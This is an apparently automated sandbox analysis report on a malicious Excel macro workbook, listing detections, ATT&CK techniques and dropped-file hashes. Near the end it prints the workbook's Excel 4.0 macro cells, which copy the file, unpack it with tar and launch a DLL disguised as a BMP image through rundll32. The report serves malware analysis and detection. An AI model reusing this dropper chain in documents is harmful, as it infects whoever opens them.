Analysis Report 4468873941_759979693.xlsm
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security | |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Source: | File opened: | behavior |
Source: | Binary string: | |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: | dropped file |
Networking: |
---|
Yara detected MalDoc1 |
Source: | File source: | |
Source: | File created: | behavior |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: (×6) | |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: | |
Office process drops PE file |
Source: | File created: | dropped file |
Source: | Dropped File: | |
Source: | Binary string: | |
Source: | Static PE information: (×8) | |
Source: | Window title found: | |
Source: | Classification label: | |
Source: | File created: (×2) | behavior |
Source: | File read: | behavior |
Source: | Window detected: | |
Source: | Initial sample: (×3) | |
Source: | Key opened: | behavior |
Source: | File opened: | behavior |
Source: | Binary string: | |
Source: | File created: (×2) | dropped file |
Source: | Process information set: (×30) | behavior |
Malware Analysis System Evasion: |
---|
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) |
Source: | Binary or memory string: (×2) | |
Source: | Dropped PE file which has not been started: | dropped file |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading11 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | System Information Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 0% | ReversingLabs | | |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 412575 |
Start date: | 12.05.2021 |
Start time: | 19:33:01 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 4468873941_759979693.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 3 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.troj.expl.evad.winXLSM@1/9@0/0 |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185386 |
Entropy (8bit): | 7.326521161282199 |
Encrypted: | false |
SSDEEP: | 3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8 |
MD5: | A6E3680B30CEC6746291E55B7D9B6975 |
SHA1: | E45C3A057F840EF4C96AB8233E1E21700BBDA199 |
SHA-256: | 89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261 |
SHA-512: | FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 647168 |
Entropy (8bit): | 6.903949816811106 |
Encrypted: | false |
SSDEEP: | 12288:uRgaHm2fjIxEh+bLlmTlEPMx4rBjVXmePxfH3KYypHKlA:2gim2fMOh+mF4NUmKYy0lA |
MD5: | C77E025AB5500D3A00B86265C73CC0B3 |
SHA1: | 83B5715406E67F33E0030C2F17991A4D4BE2CBE5 |
SHA-256: | D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803 |
SHA-512: | BCB03E9EA06A3957D3D9C032BC10B93443ED76E102FDB147B0414BA0D60F57FFD429D5B42B8878A70D1AC5A79AF9E6F8B635574E7731D3AB9BB8248CF43A8DC3 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892547340909964 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq |
MD5: | D6657AA638C3DF2BF427C21C278E328B |
SHA1: | CEFF78E927887AAD7987AC84124346E53F38F2C3 |
SHA-256: | 23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A |
SHA-512: | 693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.493322303689225 |
Encrypted: | false |
SSDEEP: | 48:8K/XT0jFD2ohH0tQh2K/XT0jFD2ohH0tQ/:8K/XojFD2C0tQh2K/XojFD2C0tQ/ |
MD5: | C21BE05514D07B27D3EF61D140FC382B |
SHA1: | 8C047B383BD5B39989F20719AF63A2451A50209B |
SHA-256: | 4FC18FCA7B8D2BDAA7F6D6FB1BAD00BA37287048E13CDB1838610F1DDB504A2F |
SHA-512: | F8317EDBCB611E4C1A39F913DECE1FA3179786D804DEB11751DCE96BFFE05AFD625133039425EA426C134DD39CF87D819C68D9EE907DCF323E72C2E2C1981411 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.472696730816663 |
Encrypted: | false |
SSDEEP: | 12:85QZCcLgXg/XAlCPCHaXtB8XzB/qPX+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJP9O:85xK/XTd6jgYe11CDv3qtrNru/ |
MD5: | B2CD84427A7343276563C7B2D120731B |
SHA1: | 70AD4C54B28C1000672AADBEE0B1D151CCFAE511 |
SHA-256: | 542A74682ED4998B3ED2FC981EA9C34C460385D8FB6CCA7983EC28578821D0BC |
SHA-512: | 5AC5D4D32E28A121915AFF1132A2F947EF42833BC1815F5C8E95C9C54B7C89A41F8961FFB5C0D7526E374B4C23B51D91AECCA6D154B6BCCF41A71F42889306F9 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.495660190158482 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWa7DOccLpS7fDOccLpSmxWa7DOccLpSv:djzCkCBCc |
MD5: | A9FD717C784D3A26BA547741BB6304EE |
SHA1: | 63FB9EB70A5C91C2B1CE15B7384725835620929A |
SHA-256: | 7F77C3AC0D59D1431C42221F62F9AA99D68724A477F92FF396058F18FF320B11 |
SHA-512: | A60F9DD8104335863122E4A9EF9FF7FF4457AC49B72DA74B1C6991A0E7BCF31658ED0F4BA1B4BFD8747DB3CA2C408BC2002C3B2B2176B86B00BA2569AF020A4E |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892547340909964 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq |
MD5: | D6657AA638C3DF2BF427C21C278E328B |
SHA1: | CEFF78E927887AAD7987AC84124346E53F38F2C3 |
SHA-256: | 23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A |
SHA-512: | 693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892547340909964 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq |
MD5: | D6657AA638C3DF2BF427C21C278E328B |
SHA1: | CEFF78E927887AAD7987AC84124346E53F38F2C3 |
SHA-256: | 23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A |
SHA-512: | 693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B |
Malicious: | false |
Reputation: | low |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.891710388965609 |
TrID: | |
File name: | 4468873941_759979693.xlsm |
File size: | 607568 |
MD5: | b5021bc6cc8e2fc2231978d6c9118f2a |
SHA1: | c11430e1206f25bf768f1643f51bed8a4a1eec9d |
SHA256: | 5600e318bd25cb62a710d880649b11c4d85ae6f8ee5c2084a9d819a16abcd3b2 |
SHA512: | e4bd8a7522c45ecf9ed9d19cd0ba4fcc66669f3ec1d1f5539ca35418844926c1f3a8285de1f4d00e7c881be313e0916b462aa3809c44c5e910b1edef9d0eadfb |
SSDEEP: | 12288:ppex0VbLbGeH+59SjNGst3hglv595+6tLAJVX0cfxBNtsY69bWed0t:pUKVbLte52dt3i/+mAJ2gsY6oe2 |
File Content Preview: | PK..........!.........3.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "4468873941_759979693.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
Cell contents in sheet order (empty cells omitted) |
---|
=SAVE.COPY.AS("..\Nioka.meposv") |
run |
dll32 ..\xl\media\im |
=EXEC("tar -xf ..\Nioka.meposv -C ..\")=PI()=PI()=PI() |
age2.bmp,StartW |
=WAIT(NOW()+"00:00:06") |
=PI()=PI()=PI()=EXEC(AL701&AL702&AL703)=PI()=PI()=PI() |
=HALT() |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
System Behavior |
---|
General |
---|
Start time: | 19:33:37 |
Start date: | 12/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fc00000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|